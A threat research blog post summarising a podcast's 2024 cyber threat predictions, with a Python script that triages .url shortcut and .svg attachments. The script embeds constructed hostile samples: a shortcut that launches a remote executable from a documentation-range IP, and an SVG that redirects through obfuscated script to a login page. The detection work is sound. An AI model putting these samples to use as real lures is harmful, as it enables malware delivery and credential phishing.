Gather ‘round, cyber friends, and I’ll let you in on a little secret: no one knows what the Next Big Thing on the threat landscape will be. But we can look back on 2023, identify notable changes and actor behaviors, and make educated assessments about what 2024 will bring.
This month on the DISCARDED podcast my co-host Crista Giering and I sat down with our Threat Research leaders Daniel Blackford, Alexis Dorais-Joncas, Randy Pargman, and Rich Gonzalez, who lead the ecrime, advanced persistent threat (APT), threat detection, and Emerging Threats teams, respectively. We discussed what we learned over the last year, and what’s on the horizon for the future. While the discussions touched on different topics and featured different opinions on everything from artificial intelligence (AI) to living off the land binaries (LOLBins) to vulnerability exploitation to ransomware, there were some notable themes that are worth writing down. We can’t say for sure what surprises are in store, but with our cyber crystal balls fully charged – and a deep knowledge of a year’s worth of threat actor activity based on millions of email threats per day – we can predict with high confidence what’s going to be impactful in the coming year.
1: Quick response (QR) codes will continue to proliferate
2023 was the year of the QR code. Although not new, QR codes burst onto the scene over the last year and were used in many credential phishing and malware campaigns. The use was driven by a confluence of factors, but ultimately boiled down to the fact that people are now far more accustomed to scanning QR codes for everything from instructions to menus, and threat actors are taking advantage: a URL encoded in an image is also invisible to any defense that only inspects the message text. Proofpoint recently launched new in-line sandboxing capabilities to better defend against this threat, and our teams anticipate seeing more of it in 2024. Notably, however, Dorais-Joncas points out that QR codes are still confined to the ecrime realm; APT actors have not yet jumped on the QR code bandwagon. (Although some of those APT actors bring ecrime energy to their campaigns, so it’s possible they may start QR code phishing, too.)
2: Zero-day and N-day vulnerability exploitation
A theme that appeared throughout our conversations was the creative use of vulnerabilities – both known and unreported – in threat actor activity. APT actors used a wide variety of exploits, from TA473 exploiting publicly facing webmail servers to espionage actors using a zero-day in an email security gateway appliance that ultimately forced users to rip out and replace physical hardware. But ecrime actors also exploited their share of vulnerabilities, including the MOVEit file transfer service vulnerability from the spring of 2023 that had cascading repercussions, and the ScreenConnect flaw announced in the fall of 2023 – both of which were used by ecrime actors before they were publicly disclosed. Proofpoint anticipates vulnerability exploitation will continue, driven in part by improved defenses making old school techniques – like macro-enabled documents – much less useful, as well as by the vast financial resources now available to cybercriminals that were once the domain of APT alone. Pargman says the creativity from ecrime threat actors is a direct response to defenders imposing cost on our adversaries.
3: Continuing, unexpected behavior changes
Avid listeners of the podcast know I have regularly said the ecrime landscape is extremely chaotic, with TA577 demonstrating the most chaotic vibes of them all. The tactics, techniques, and procedures (TTPs) of some of the most sophisticated actors continue to change. The cost imposed on threat actors that Pargman mentioned – from law enforcement takedowns of massive botnets like Qbot to improved detections and automated defenses – has forced threat actors, cybercriminals in particular, to regularly change their behaviors to figure out what is most effective. For example, recently Proofpoint has observed the increased use of: traffic distribution systems (TDSes) such as 404 TDS and Keitaro TDS; unique, infrequently observed filetypes such as URL shortcut (.url) and scalable vector graphic (.svg) files, which many attachment filters still treat as harmless text or images; multiple new malware loaders and information stealers; and older malware like DarkGate resurfacing as popular payloads. Ecrime threat actors will change their behaviors in direct response to what defenders are doing, and we expect to see a lot more TTP experimentation in 2024.
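The two filetypes called out above are worth a closer look, because neither is a binary and both slip past scanners tuned for executables and Office documents. A .url file is a plain INI file whose URL= line Explorer follows when the file is opened, so a target like file:// or a UNC path makes Windows fetch and run something rather than open a browser, and a remote IconFile= is fetched the moment the file is rendered. An SVG is XML that browsers treat as a document, so it can carry <script>, event-handler attributes, and <foreignObject> HTML just like a web page. The triage script below is an added example written for this post, not Proofpoint detection logic or code from the podcast; the heuristics, the sample files, and the 203.0.113.x addresses are all constructed for illustration.

```python
"""Heuristic triage for .url shortcut and .svg attachments (constructed example)."""
import configparser
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SAFE_SCHEMES = {"http", "https"}
EXECUTABLE_EXT = re.compile(r"\.(exe|dll|scr|js|jse|vbs|wsf|hta|msi|bat|cmd|ps1|lnk)(?:[?#]|$)", re.I)
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
RISKY_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
SCRIPT_INDICATORS = re.compile(r"\b(atob|eval|unescape|fromCharCode|location|document\.write)\b")


def _is_remote(value: str) -> bool:
    """True for UNC paths and any scheme-qualified URL (http, file, smb, WebDAV ...)."""
    return value.startswith("\\\\") or "://" in value


def triage_url_file(text: str) -> list[str]:
    """Return reasons a .url file looks suspicious; an empty list means nothing fired."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error as exc:
        return [f"unparseable .url file: {exc}"]
    if not parser.has_section("InternetShortcut"):
        return ["no [InternetShortcut] section"]
    section = parser["InternetShortcut"]
    target = section.get("URL", "").strip()
    findings = []
    scheme = urlparse(target).scheme.lower()
    if not target:
        findings.append("shortcut has no URL target")
    elif scheme not in SAFE_SCHEMES:
        # file://, smb://, WebDAV and bare \\host\share targets are opened by
        # Explorer, not a browser: the payload is fetched and launched.
        findings.append(f"URL uses scheme {scheme or '(none)'!r}: {target}")
    if EXECUTABLE_EXT.search(target):
        findings.append(f"URL target has an executable extension: {target}")
    icon = section.get("IconFile", "").strip()
    if icon and _is_remote(icon):
        # A remote icon is fetched on render, before any click; a UNC icon path
        # also triggers an outbound SMB/WebDAV connection and NTLM authentication.
        findings.append(f"IconFile points to a remote location: {icon}")
    return findings


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def triage_svg(text: str) -> list[str]:
    """Return reasons an SVG looks like a script or phishing carrier rather than an image."""
    # Untrusted XML should be parsed with defusedxml in production; the stdlib
    # parser is used here only so the example runs with no dependencies.
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name.lower() in RISKY_ELEMENTS:
            findings.append(f"<{name}> element present")
        if name.lower() == "script":
            hits = sorted(set(SCRIPT_INDICATORS.findall("".join(el.itertext()))))
            if hits:
                findings.append(f"script body references {', '.join(hits)}")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if EVENT_ATTR.match(aname):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname.lower() in ("href", "src"):
                scheme = urlparse(value.strip()).scheme.lower()
                if scheme in ("javascript", "data"):
                    findings.append(f"{aname} on <{name}> uses a {scheme}: URI")
                elif scheme in SAFE_SCHEMES:
                    findings.append(f"{aname} on <{name}> points off-document: {value}")
    return findings


# Constructed samples: a shortcut that launches a remote executable, a benign
# shortcut, an SVG that redirects via obfuscated script, and a plain image.
SAMPLE_URL = r"""[InternetShortcut]
URL=file://203.0.113.5/share/invoice.exe
IconFile=\\203.0.113.5\share\icon.ico
IconIndex=1
"""
BENIGN_URL = "[InternetShortcut]\nURL=https://www.example.com/\n"
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1" onload="go()">
  <script><![CDATA[
    function go() { window.location = atob("aHR0cHM6Ly9sb2dpbi5leGFtcGxlLm5ldC8="); }
  ]]></script>
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">Loading secure document...</div>
  </foreignObject>
</svg>"""
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

if __name__ == "__main__":
    for label, result in [("invoice.url", triage_url_file(SAMPLE_URL)),
                          ("link.url", triage_url_file(BENIGN_URL)),
                          ("document.svg", triage_svg(SAMPLE_SVG)),
                          ("logo.svg", triage_svg(BENIGN_SVG))]:
        print(label, "->", result or "clean")
```

The point of the SVG rules is that the file does not need to contain anything that looks like a known payload: an onload handler, a base64 blob and a window.location assignment are enough to bounce the victim to a credential page, and the same document can also draw an entirely legitimate-looking image. The .url rules are deliberately blunt; in an email context there is rarely a good reason for a shortcut attachment to point anywhere other than https.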
4: Artificial Intelligence (AI)
Threat actors will explore ways to incorporate AI into their workflows, much as corporations are doing for themselves. While there is much concern about AI-created phishing emails and content in general, the impact of such threats will be negligible, because the same tools that detect malicious language, sentiment, tone, subject, etc. are just as effective against machine-generated text as against human-written text. What will be impactful is using AI tools to improve overall efficiency, such as scaling information operations or fraud that begins with a benign conversation; using coding assistants to fill knowledge gaps; or creating malicious content faster. At Proofpoint, one of the most effective AI tools in our Threat Research toolbox is Camp Disco, our malware clustering engine. Our data scientists created a custom language model for malware forensics that serves as the backbone for Camp Disco, and the result is hundreds of hours saved while threat hunting.
5: Community sharing is community defense
One of the best parts of the Emerging Threats team is the incredible support we get from the community sharing information on new malware, TTPs, infrastructure, packet captures (PCAPs), phishing kits, and so much more. The Threat Research blog also serves as a way for our team to share the latest insights gleaned from our vast corpus of data. As the threat landscape continues to change and new threats, exploits, and techniques emerge, the cybersecurity community continues to collectively share and defend against our adversaries. In 2024, this community mindset is going to be more important than ever. And we can’t wait to be a part of it.
Listen to the DISCARDED episodes now:
Phishing, Elections, and Costly Attacks: Part One of Predicting Cyber Threats in 2024
Strategies for Defense and Disruption: Part Two of Predicting Cyber Threats in 2024
Thanks to all our listeners, and until next time, happy hunting!